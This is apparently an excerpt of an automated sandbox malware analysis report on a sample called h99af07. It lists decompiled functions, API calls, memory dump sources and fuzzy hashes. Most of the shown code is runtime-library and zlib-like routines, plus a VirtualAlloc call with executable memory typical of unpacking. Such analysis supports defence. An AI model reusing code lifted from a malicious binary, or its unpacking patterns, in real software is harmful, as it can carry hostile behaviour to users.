Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: B4112B79A40208EFDB01DF98C985E98BBF5AF08350F1580A5F9489B361D371EA50DF80

Uniqueness

Uniqueness Score: -1.00%

Function 02E9732F Relevance: 1.3, APIs: 1, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 02E98066

Memory Dump Source

Source File: 00000005.00000002.307087402.0000000002E97000.00000040.00000020.00020000.00000000.sdmp, Offset: 02E97000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e97000_h99af07.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 8abcfe2d330a474587a20913b993d86f62d60582a0f0bfb27502617114165f78
Instruction ID: 0141170334153c681703b7318469ae5428d786f8bd0df2a4c3e1cab0bb4c982f
Opcode Fuzzy Hash: 8abcfe2d330a474587a20913b993d86f62d60582a0f0bfb27502617114165f78
Instruction Fuzzy Hash: 32017175948284EFDB02CF64C990A9C7FB0EF06200F1580D6E4949B363D2309A12DF50

Uniqueness

Uniqueness Score: -1.00%

Function 02E6D005 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.307009337.0000000002E6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E6D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e6d000_h99af07.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0865d1356656ac2e4b6339f6f62dd704ea7f91f1b72bb292c8a668e3f099ac40
Instruction ID: b4be991e905bad175dab0e85f342332dcd2d534ccfd04933ce0d50109110a7ea
Opcode Fuzzy Hash: 0865d1356656ac2e4b6339f6f62dd704ea7f91f1b72bb292c8a668e3f099ac40
Instruction Fuzzy Hash: 2701926104D3C09FE7138B258C94B62BFB4DF43228F19C1DBD9889F293C2694849C772

Uniqueness

Uniqueness Score: -1.00%

Function 02E6D01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.307009337.0000000002E6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E6D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e6d000_h99af07.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e810487e831f9e2f552779ed242e682467dae1c0a1ee1901c8ae8ce2d71e8d3
Instruction ID: ebbd9f6379a2497cdb61984770c149bfac4d681e1298a35a067999959699f9b6
Opcode Fuzzy Hash: 2e810487e831f9e2f552779ed242e682467dae1c0a1ee1901c8ae8ce2d71e8d3
Instruction Fuzzy Hash: 8D01FC715883809AE7504B15CC88BB6BFD9EF452B8F54D01AED095B242C3789845C6B1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0040CE09 Relevance: 7.6, APIs: 5, Instructions: 58
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E0040CE09(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t6;
				intOrPtr _t11;
				intOrPtr _t12;
				intOrPtr _t13;
				long _t17;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t31;
				void* _t34;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ecx;
				_t21 = __ebx;
				_t6 = __eax;
				_t34 = _t22 -  *0x422234; // 0x7d62f378
				if(_t34 == 0) {
					asm("repe ret");
				}
				 *0x423b98 = _t6;
				 *0x423b94 = _t22;
				 *0x423b90 = _t25;
				 *0x423b8c = _t21;
				 *0x423b88 = _t27;
				 *0x423b84 = _t26;
				 *0x423bb0 = ss;
				 *0x423ba4 = cs;
				 *0x423b80 = ds;
				 *0x423b7c = es;
				 *0x423b78 = fs;
				 *0x423b74 = gs;
				asm("pushfd");
				_pop( *0x423ba8);
				 *0x423b9c =  *_t31;
				 *0x423ba0 = _v0;
				 *0x423bac =  &_a4;
				 *0x423ae8 = 0x10001;
				_t11 =  *0x423ba0; // 0x0
				 *0x423a9c = _t11;
				 *0x423a90 = 0xc0000409;
				 *0x423a94 = 1;
				_t12 =  *0x422234; // 0x7d62f378
				_v812 = _t12;
				_t13 =  *0x422238; // 0x829d0c87
				_v808 = _t13;
				 *0x423ae0 = IsDebuggerPresent();
				_push(1);
				E004138FC(_t14);
				SetUnhandledExceptionFilter(0);
				_t17 = UnhandledExceptionFilter(0x41fb80);
				if( *0x423ae0 == 0) {
					_push(1);
					E004138FC(_t17);
				}
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}

0x0040ce09
0x0040ce09
0x0040ce09
0x0040ce09
0x0040ce09
0x0040ce09
0x0040ce09
0x0040ce0f
0x0040ce11
0x0040ce11
0x00413644
0x00413649
0x0041364f
0x00413655
0x0041365b
0x00413661
0x00413667
0x0041366e
0x00413675
0x0041367c
0x00413683
0x0041368a
0x00413691
0x00413692
0x0041369b
0x004136a3
0x004136ab
0x004136b6
0x004136c0
0x004136c5
0x004136ca
0x004136d4
0x004136de
0x004136e3
0x004136e9
0x004136ee
0x004136fa
0x004136ff
0x00413701
0x00413709
0x00413714
0x00413721
0x00413723
0x00413725
0x0041372a
0x0041373e

APIs

IsDebuggerPresent.KERNEL32 ref: 004136F4
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00413709
UnhandledExceptionFilter.KERNEL32(0041FB80), ref: 00413714
GetCurrentProcess.KERNEL32(C0000409), ref: 00413730
TerminateProcess.KERNEL32(00000000), ref: 00413737

Memory Dump Source

Source File: 00000005.00000002.306344937.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.306344937.0000000000426000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.306344937.000000000042F000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_h99af07.jbxd

Yara matches

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
Instruction ID: 93bf0ba95bc2a0faef8203f21c221f33afe887fd41373e09ae0fa508b254143b
Opcode Fuzzy Hash: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
Instruction Fuzzy Hash: A521C3B4601204EFD720DF65E94A6457FB4FB08356F80407AE50887772E7B86682CF4D

Uniqueness

Uniqueness Score: -1.00%

Function 0040ADB0 Relevance: 2.5, APIs: 2, Instructions: 23
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040ADB0(intOrPtr* __ecx) {
				void* _t5;
				intOrPtr* _t11;

				_t11 = __ecx;
				_t5 =  *(__ecx + 8);
				 *__ecx = 0x41eff0;
				if(_t5 != 0) {
					_t5 =  *((intOrPtr*)( *((intOrPtr*)( *_t5 + 8))))(_t5);
				}
				if( *(_t11 + 0xc) != 0) {
					_t5 = GetProcessHeap();
					if(_t5 != 0) {
						return HeapFree(_t5, 0,  *(_t11 + 0xc));
					}
				}
				return _t5;
			}

0x0040adb3
0x0040adb5
0x0040adb8
0x0040adc0
0x0040adc8
0x0040adc8
0x0040adce
0x0040add0
0x0040add8
0x00000000
0x0040ade1
0x0040add8
0x0040ade8

APIs

GetProcessHeap.KERNEL32 ref: 0040ADD0
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040ADE1

Memory Dump Source

Source File: 00000005.00000002.306344937.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.306344937.0000000000426000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.306344937.000000000042F000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_h99af07.jbxd

Yara matches

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
Instruction ID: 72dd180cd7110ee49b406fd12918c6a771032a3efea8c67e715e4993f3fed615
Opcode Fuzzy Hash: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
Instruction Fuzzy Hash: 54E09A312003009FC320AB61DC08FA337AAEF88311F04C829E55A936A0DB78EC42CB58

Uniqueness

Uniqueness Score: -1.00%

Function 02E97C33 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.307087402.0000000002E97000.00000040.00000020.00020000.00000000.sdmp, Offset: 02E97000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e97000_h99af07.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9aa0792d5a99004b1d18a79acfeba806887c526e9caee5a3d511399985f3857
Instruction ID: 2de2e1fe3aefde0cbd8c93b4719bc6d955b72902a34e1b0d72448dabc1e5d9a1
Opcode Fuzzy Hash: c9aa0792d5a99004b1d18a79acfeba806887c526e9caee5a3d511399985f3857
Instruction Fuzzy Hash: 400161B2390100AFEB44DF55CCC0FE6B7EAEB8D324B298055E904CB316D675E841CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00417081 Relevance: 31.8, APIs: 21, Instructions: 340
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 86%

			E00417081(short* __ecx, int _a4, signed int _a8, char* _a12, int _a16, char* _a20, int _a24, int _a28, intOrPtr _a32) {
				signed int _v8;
				int _v12;
				int _v16;
				int _v20;
				intOrPtr _v24;
				void* _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t110;
				intOrPtr _t112;
				intOrPtr _t113;
				short* _t115;
				short* _t116;
				char* _t120;
				short* _t121;
				short* _t123;
				short* _t127;
				int _t128;
				short* _t141;
				signed int _t144;
				void* _t146;
				short* _t147;
				signed int _t150;
				short* _t153;
				char* _t157;
				int _t160;
				long _t162;
				signed int _t174;
				signed int _t178;
				signed int _t179;
				int _t182;
				short* _t184;
				signed int _t186;
				signed int _t188;
				short* _t189;
				int _t191;
				intOrPtr _t194;
				int _t207;

				_t110 =  *0x422234; // 0x7d62f378
				_v8 = _t110 ^ _t188;
				_t184 = __ecx;
				_t194 =  *0x423e7c; // 0x1
				if(_t194 == 0) {
					_t182 = 1;
					if(LCMapStringW(0, 0x100, 0x420398, 1, 0, 0) == 0) {
						_t162 = GetLastError();
						__eflags = _t162 - 0x78;
						if(_t162 == 0x78) {
							 *0x423e7c = 2;
						}
					} else {
						 *0x423e7c = 1;
					}
				}
				if(_a16 <= 0) {
					L13:
					_t112 =  *0x423e7c; // 0x1
					if(_t112 == 2 || _t112 == 0) {
						_v16 = 0;
						_v20 = 0;
						__eflags = _a4;
						if(_a4 == 0) {
							_a4 =  *((intOrPtr*)( *_t184 + 0x14));
						}
						__eflags = _a28;
						if(_a28 == 0) {
							_a28 =  *((intOrPtr*)( *_t184 + 4));
						}
						_t113 = E00417A20(0, _t179, _t182, _t184, _a4);
						_v24 = _t113;
						__eflags = _t113 - 0xffffffff;
						if(_t113 != 0xffffffff) {
							__eflags = _t113 - _a28;
							if(_t113 == _a28) {
								_t184 = LCMapStringA(_a4, _a8, _a12, _a16, _a20, _a24);
								L78:
								__eflags = _v16;
								if(__eflags != 0) {
									_push(_v16);
									E0040B6B5(0, _t182, _t184, __eflags);
								}
								_t115 = _v20;
								__eflags = _t115;
								if(_t115 != 0) {
									__eflags = _a20 - _t115;
									if(__eflags != 0) {
										_push(_t115);
										E0040B6B5(0, _t182, _t184, __eflags);
									}
								}
								_t116 = _t184;
								goto L84;
							}
							_t120 = E00417A69(_t179, _a28, _t113, _a12,  &_a16, 0, 0);
							_t191 =  &(_t189[0xc]);
							_v16 = _t120;
							__eflags = _t120;
							if(_t120 == 0) {
								goto L58;
							}
							_t121 = LCMapStringA(_a4, _a8, _t120, _a16, 0, 0);
							_v12 = _t121;
							__eflags = _t121;
							if(__eflags != 0) {
								if(__eflags <= 0) {
									L71:
									_t182 = 0;
									__eflags = 0;
									L72:
									__eflags = _t182;
									if(_t182 == 0) {
										goto L62;
									}
									E0040BA30(_t182, _t182, 0, _v12);
									_t123 = LCMapStringA(_a4, _a8, _v16, _a16, _t182, _v12);
									_v12 = _t123;
									__eflags = _t123;
									if(_t123 != 0) {
										_t186 = E00417A69(_t179, _v24, _a28, _t182,  &_v12, _a20, _a24);
										_v20 = _t186;
										asm("sbb esi, esi");
										_t184 =  ~_t186 & _v12;
										__eflags = _t184;
									} else {
										_t184 = 0;
									}
									E004147AE(_t182);
									goto L78;
								}
								__eflags = _t121 - 0xffffffe0;
								if(_t121 > 0xffffffe0) {
									goto L71;
								}
								_t127 =  &(_t121[4]);
								__eflags = _t127 - 0x400;
								if(_t127 > 0x400) {
									_t128 = E0040B84D(0, _t179, _t182, _t127);
									__eflags = _t128;
									if(_t128 != 0) {
										 *_t128 = 0xdddd;
										_t128 = _t128 + 8;
										__eflags = _t128;
									}
									_t182 = _t128;
									goto L72;
								}
								E0040CFB0(_t127);
								_t182 = _t191;
								__eflags = _t182;
								if(_t182 == 0) {
									goto L62;
								}
								 *_t182 = 0xcccc;
								_t182 = _t182 + 8;
								goto L72;
							}
							L62:
							_t184 = 0;
							goto L78;
						} else {
							goto L58;
						}
					} else {
						if(_t112 != 1) {
							L58:
							_t116 = 0;
							L84:
							return E0040CE09(_t116, 0, _v8 ^ _t188, _t179, _t182, _t184);
						}
						_v12 = 0;
						if(_a28 == 0) {
							_a28 =  *((intOrPtr*)( *_t184 + 4));
						}
						_t184 = MultiByteToWideChar;
						_t182 = MultiByteToWideChar(_a28, 1 + (0 | _a32 != 0x00000000) * 8, _a12, _a16, 0, 0);
						_t207 = _t182;
						if(_t207 == 0) {
							goto L58;
						} else {
							if(_t207 <= 0) {
								L28:
								_v16 = 0;
								L29:
								if(_v16 == 0) {
									goto L58;
								}
								if(MultiByteToWideChar(_a28, 1, _a12, _a16, _v16, _t182) == 0) {
									L52:
									E004147AE(_v16);
									_t116 = _v12;
									goto L84;
								}
								_t184 = LCMapStringW;
								_t174 = LCMapStringW(_a4, _a8, _v16, _t182, 0, 0);
								_v12 = _t174;
								if(_t174 == 0) {
									goto L52;
								}
								if((_a8 & 0x00000400) == 0) {
									__eflags = _t174;
									if(_t174 <= 0) {
										L44:
										_t184 = 0;
										__eflags = 0;
										L45:
										__eflags = _t184;
										if(_t184 != 0) {
											_t141 = LCMapStringW(_a4, _a8, _v16, _t182, _t184, _v12);
											__eflags = _t141;
											if(_t141 != 0) {
												_push(0);
												_push(0);
												__eflags = _a24;
												if(_a24 != 0) {
													_push(_a24);
													_push(_a20);
												} else {
													_push(0);
													_push(0);
												}
												_v12 = WideCharToMultiByte(_a28, 0, _t184, _v12, ??, ??, ??, ??);
											}
											E004147AE(_t184);
										}
										goto L52;
									}
									_t144 = 0xffffffe0;
									_t179 = _t144 % _t174;
									__eflags = _t144 / _t174 - 2;
									if(_t144 / _t174 < 2) {
										goto L44;
									}
									_t52 = _t174 + 8; // 0x8
									_t146 = _t174 + _t52;
									__eflags = _t146 - 0x400;
									if(_t146 > 0x400) {
										_t147 = E0040B84D(0, _t179, _t182, _t146);
										__eflags = _t147;
										if(_t147 != 0) {
											 *_t147 = 0xdddd;
											_t147 =  &(_t147[4]);
											__eflags = _t147;
										}
										_t184 = _t147;
										goto L45;
									}
									E0040CFB0(_t146);
									_t184 = _t189;
									__eflags = _t184;
									if(_t184 == 0) {
										goto L52;
									}
									 *_t184 = 0xcccc;
									_t184 =  &(_t184[4]);
									goto L45;
								}
								if(_a24 != 0 && _t174 <= _a24) {
									LCMapStringW(_a4, _a8, _v16, _t182, _a20, _a24);
								}
								goto L52;
							}
							_t150 = 0xffffffe0;
							_t179 = _t150 % _t182;
							if(_t150 / _t182 < 2) {
								goto L28;
							}
							_t25 = _t182 + 8; // 0x8
							_t152 = _t182 + _t25;
							if(_t182 + _t25 > 0x400) {
								_t153 = E0040B84D(0, _t179, _t182, _t152);
								__eflags = _t153;
								if(_t153 == 0) {
									L27:
									_v16 = _t153;
									goto L29;
								}
								 *_t153 = 0xdddd;
								L26:
								_t153 =  &(_t153[4]);
								goto L27;
							}
							E0040CFB0(_t152);
							_t153 = _t189;
							if(_t153 == 0) {
								goto L27;
							}
							 *_t153 = 0xcccc;
							goto L26;
						}
					}
				}
				_t178 = _a16;
				_t157 = _a12;
				while(1) {
					_t178 = _t178 - 1;
					if( *_t157 == 0) {
						break;
					}
					_t157 =  &(_t157[1]);
					if(_t178 != 0) {
						continue;
					}
					_t178 = _t178 | 0xffffffff;
					break;
				}
				_t160 = _a16 - _t178 - 1;
				if(_t160 < _a16) {
					_t160 = _t160 + 1;
				}
				_a16 = _t160;
				goto L13;
			}

0x00417089
0x00417090
0x00417098
0x0041709a
0x004170a0
0x004170a6
0x004170bb
0x004170c5
0x004170cb
0x004170ce
0x004170d0
0x004170d0
0x004170bd
0x004170bd
0x004170bd
0x004170bb
0x004170dd
0x00417101
0x00417101
0x00417109
0x004172bb
0x004172be
0x004172c1
0x004172c4
0x004172cb
0x004172cb
0x004172ce
0x004172d1
0x004172d8
0x004172d8
0x004172de
0x004172e4
0x004172e7
0x004172ea
0x004172f3
0x004172f6
0x004173ef
0x004173f1
0x004173f1
0x004173f4
0x004173f6
0x004173f9
0x004173fe
0x004173ff
0x00417402
0x00417404
0x00417406
0x00417409
0x0041740b
0x0041740c
0x00417411
0x00417409
0x00417412
0x00000000
0x00417412
0x00417309
0x0041730e
0x00417311
0x00417314
0x00417316
0x00000000
0x00000000
0x0041732a
0x0041732c
0x0041732f
0x00417331
0x0041733a
0x00417379
0x00417379
0x00417379
0x0041737b
0x0041737b
0x0041737d
0x00000000
0x00000000
0x00417384
0x0041739c
0x0041739e
0x004173a1
0x004173a3
0x004173bf
0x004173c1
0x004173c9
0x004173cb
0x004173cb
0x004173a5
0x004173a5
0x004173a5
0x004173cf
0x00000000
0x004173d4
0x0041733c
0x0041733f
0x00000000
0x00000000
0x00417341
0x00417344
0x00417349
0x00417362
0x00417368
0x0041736a
0x0041736c
0x00417372
0x00417372
0x00417372
0x00417375
0x00000000
0x00417375
0x0041734b
0x00417350
0x00417352
0x00417354
0x00000000
0x00000000
0x00417356
0x0041735c
0x00000000
0x0041735c
0x00417333
0x00417333
0x00000000
0x00000000
0x00000000
0x00000000
0x00417117
0x0041711a
0x004172ec
0x004172ec
0x00417414
0x00417425
0x00417425
0x00417120
0x00417126
0x0041712d
0x0041712d
0x00417130
0x00417153
0x00417155
0x00417157
0x00000000
0x0041715d
0x0041715d
0x004171a2
0x004171a2
0x004171a5
0x004171a8
0x00000000
0x00000000
0x004171c1
0x004172aa
0x004172ad
0x004172b2
0x00000000
0x004172b5
0x004171c7
0x004171db
0x004171dd
0x004171e2
0x00000000
0x00000000
0x004171ef
0x0041721a
0x0041721c
0x00417263
0x00417263
0x00417263
0x00417265
0x00417265
0x00417267
0x00417277
0x0041727d
0x0041727f
0x00417281
0x00417282
0x00417283
0x00417286
0x0041728c
0x0041728f
0x00417288
0x00417288
0x00417289
0x00417289
0x004172a0
0x004172a0
0x004172a4
0x004172a9
0x00000000
0x00417267
0x00417222
0x00417223
0x00417225
0x00417228
0x00000000
0x00000000
0x0041722a
0x0041722a
0x0041722e
0x00417233
0x0041724c
0x00417252
0x00417254
0x00417256
0x0041725c
0x0041725c
0x0041725c
0x0041725f
0x00000000
0x0041725f
0x00417235
0x0041723a
0x0041723c
0x0041723e
0x00000000
0x00000000
0x00417240
0x00417246
0x00000000
0x00417246
0x004171f4
0x00417213
0x00417213
0x00000000
0x004171f4
0x00417163
0x00417164
0x00417169
0x00000000
0x00000000
0x0041716b
0x0041716b
0x00417174
0x0041718a
0x00417190
0x00417192
0x0041719d
0x0041719d
0x00000000
0x0041719d
0x00417194
0x0041719a
0x0041719a
0x00000000
0x0041719a
0x00417176
0x0041717b
0x0041717f
0x00000000
0x00000000
0x00417181
0x00000000
0x00417181
0x00417157
0x00417109
0x004170df
0x004170e2
0x004170e5
0x004170e5
0x004170e8
0x00000000
0x00000000
0x004170ea
0x004170ed
0x00000000
0x00000000
0x004170ef
0x00000000
0x004170ef
0x004170f7
0x004170fb
0x004170fd
0x004170fd
0x004170fe
0x00000000

APIs

LCMapStringW.KERNEL32(00000000,00000100,00420398,00000001,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004170B3
GetLastError.KERNEL32(?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000,?,7FFFFFFF,00000000,00000000,?,02C318D0), ref: 004170C5
MultiByteToWideChar.KERNEL32(7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 00417151
_malloc.LIBCMT ref: 0041718A
MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171BD
LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171D9
LCMapStringW.KERNEL32(?,00000400,00000400,00000000,?,?), ref: 00417213
_malloc.LIBCMT ref: 0041724C
LCMapStringW.KERNEL32(?,00000400,00000400,00000000,00000000,?), ref: 00417277
WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 0041729A
__freea.LIBCMT ref: 004172A4
__freea.LIBCMT ref: 004172AD
___ansicp.LIBCMT ref: 004172DE
___convertcp.LIBCMT ref: 00417309
LCMapStringA.KERNEL32(?,?,00000000,?,00000000,00000000,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?), ref: 0041732A
_malloc.LIBCMT ref: 00417362
_memset.LIBCMT ref: 00417384
LCMapStringA.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?), ref: 0041739C
___convertcp.LIBCMT ref: 004173BA
__freea.LIBCMT ref: 004173CF
LCMapStringA.KERNEL32(?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004173E9

Memory Dump Source

Source File: 00000005.00000002.306344937.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.306344937.0000000000426000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.306344937.000000000042F000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_h99af07.jbxd

Yara matches

Similarity

API ID: String$ByteCharMultiWide__freea_malloc$___convertcp$ErrorLast___ansicp_memset
String ID:
API String ID: 3809854901-0
Opcode ID: 6e0241b6e147b769e02d4c25b4a62de63cd09900d226416504aadb47099bd534
Instruction ID: cdfffc9a1d2b3026f9ae82d5cc8d175594050d3ba9b5f3d3ede674b9b5b9b85c
Opcode Fuzzy Hash: 6e0241b6e147b769e02d4c25b4a62de63cd09900d226416504aadb47099bd534
Instruction Fuzzy Hash: 29B1B072908119EFCF119FA0CC808EF7BB5EF48354B14856BF915A2260D7398DD2DB98

Uniqueness

Uniqueness Score: -1.00%

Function 004057B0 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 205
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E004057B0(intOrPtr* __eax) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t57;
				char* _t60;
				char _t62;
				intOrPtr _t63;
				char _t64;
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t67;
				intOrPtr _t69;
				intOrPtr _t70;
				intOrPtr _t74;
				intOrPtr _t79;
				intOrPtr _t82;
				intOrPtr* _t83;
				void* _t86;
				char* _t88;
				char* _t89;
				intOrPtr* _t91;
				intOrPtr* _t93;
				signed int _t97;
				signed int _t98;
				void* _t100;
				void* _t101;
				void* _t102;
				void* _t103;
				void* _t104;

				_t98 = _t97 | 0xffffffff;
				 *((intOrPtr*)(_t100 + 0xc)) = 0;
				_t91 = __eax;
				 *((intOrPtr*)(_t100 + 0x10)) = _t100 + 0x10;
				if( *((intOrPtr*)(_t100 + 0x68)) == 0 || __eax == 0) {
					__eflags = 0;
					return 0;
				} else {
					_t93 = E0040B84D(0, _t86, __eax, 0x74);
					_t101 = _t100 + 4;
					if(_t93 == 0) {
						L31:
						return 0;
					} else {
						 *((intOrPtr*)(_t93 + 0x20)) = 0;
						 *((intOrPtr*)(_t93 + 0x24)) = 0;
						 *((intOrPtr*)(_t93 + 0x28)) = 0;
						 *((intOrPtr*)(_t93 + 0x44)) = 0;
						 *_t93 = 0;
						 *((intOrPtr*)(_t93 + 0x48)) = 0;
						 *((intOrPtr*)(_t93 + 0xc)) = 0;
						 *((intOrPtr*)(_t93 + 0x10)) = 0;
						 *((intOrPtr*)(_t93 + 4)) = 0;
						 *((intOrPtr*)(_t93 + 0x40)) = 0;
						 *((intOrPtr*)(_t93 + 0x38)) = 0;
						 *((intOrPtr*)(_t93 + 0x3c)) = 0;
						 *((intOrPtr*)(_t93 + 0x64)) = 0;
						 *((intOrPtr*)(_t93 + 0x68)) = 0;
						 *(_t93 + 0x6c) = _t98;
						 *((intOrPtr*)(_t93 + 0x4c)) = E00403080(0, 0, 0);
						_t57 =  *((intOrPtr*)(_t101 + 0x78));
						_t102 = _t101 + 0xc;
						 *((intOrPtr*)(_t93 + 0x50)) = 0;
						 *((intOrPtr*)(_t93 + 0x58)) = 0;
						_t87 = _t57 + 1;
						do {
							_t82 =  *_t57;
							_t57 = _t57 + 1;
						} while (_t82 != 0);
						_t60 = E0040B84D(0, _t87, _t91, _t57 - _t87 + 1);
						_t103 = _t102 + 4;
						 *((intOrPtr*)(_t93 + 0x54)) = _t60;
						if(_t60 == 0) {
							L30:
							E00405160(0, _t87, _t93);
							goto L31;
						} else {
							_t83 =  *((intOrPtr*)(_t103 + 0x6c));
							_t88 = _t60;
							goto L7;
							L9:
							L9:
							if( *_t91 == 0x72) {
								 *((char*)(_t93 + 0x5c)) = 0x72;
							}
							_t63 =  *_t91;
							if(_t63 == 0x77 || _t63 == 0x61) {
								 *((char*)(_t93 + 0x5c)) = 0x77;
							}
							_t64 =  *_t91;
							if(_t64 < 0x30 || _t64 > 0x39) {
								__eflags = _t64 - 0x66;
								if(_t64 != 0x66) {
									__eflags = _t64 - 0x68;
									if(_t64 != 0x68) {
										__eflags = _t64 - 0x52;
										if(_t64 != 0x52) {
											_t89 =  *((intOrPtr*)(_t103 + 0x14));
											 *_t89 = _t64;
											_t87 = _t89 + 1;
											__eflags = _t87;
											 *((intOrPtr*)(_t103 + 0x14)) = _t87;
										} else {
											 *((intOrPtr*)(_t103 + 0x10)) = 3;
										}
									} else {
										 *((intOrPtr*)(_t103 + 0x10)) = 2;
									}
								} else {
									 *((intOrPtr*)(_t103 + 0x10)) = 1;
								}
							} else {
								_t98 = _t64 - 0x30;
							}
							_t91 = _t91 + 1;
							if(_t64 == 0) {
								goto L26;
							}
							_t87 = _t103 + 0x68;
							if( *((intOrPtr*)(_t103 + 0x14)) != _t103 + 0x68) {
								goto L9;
							}
							L26:
							_t65 =  *((intOrPtr*)(_t93 + 0x5c));
							if(_t65 == 0) {
								goto L30;
							} else {
								if(_t65 != 0x77) {
									_t66 = E0040B84D(0, _t87, _t91, 0x4000);
									 *((intOrPtr*)(_t93 + 0x44)) = _t66;
									 *_t93 = _t66;
									_t67 = E004071A0(_t93, 0xfffffff1, "1.2.3", 0x38);
									_t104 = _t103 + 0x14;
									__eflags = _t67;
									if(_t67 != 0) {
										goto L30;
									} else {
										__eflags =  *((intOrPtr*)(_t93 + 0x44));
										if(__eflags == 0) {
											goto L30;
										} else {
											goto L34;
										}
									}
								} else {
									_push(0x38);
									_push("1.2.3");
									_push( *((intOrPtr*)(_t103 + 0x10)));
									_push(8);
									_push(0xfffffff1);
									_push(8);
									_push(_t98);
									_push(_t93);
									_t91 = E00404CE0();
									_t79 = E0040B84D(0, _t87, _t91, 0x4000);
									_t104 = _t103 + 0x24;
									 *((intOrPtr*)(_t93 + 0x48)) = _t79;
									 *((intOrPtr*)(_t93 + 0xc)) = _t79;
									if(_t91 != 0 || _t79 == 0) {
										goto L30;
									} else {
										L34:
										 *((intOrPtr*)(_t93 + 0x10)) = 0x4000;
										 *((intOrPtr*)(E0040BFC1(__eflags))) = 0;
										_t69 =  *((intOrPtr*)(_t104 + 0x70));
										__eflags = _t69;
										_push(_t104 + 0x18);
										if(__eflags >= 0) {
											_push(_t69);
											_t70 = E0040C953(0, _t87, _t91, _t93, __eflags);
										} else {
											_t87 =  *((intOrPtr*)(_t104 + 0x70));
											_push( *((intOrPtr*)(_t104 + 0x70)));
											_t70 = E0040CB9D();
										}
										 *((intOrPtr*)(_t93 + 0x40)) = _t70;
										__eflags = _t70;
										if(_t70 == 0) {
											goto L30;
										} else {
											__eflags =  *((char*)(_t93 + 0x5c)) - 0x77;
											if( *((char*)(_t93 + 0x5c)) != 0x77) {
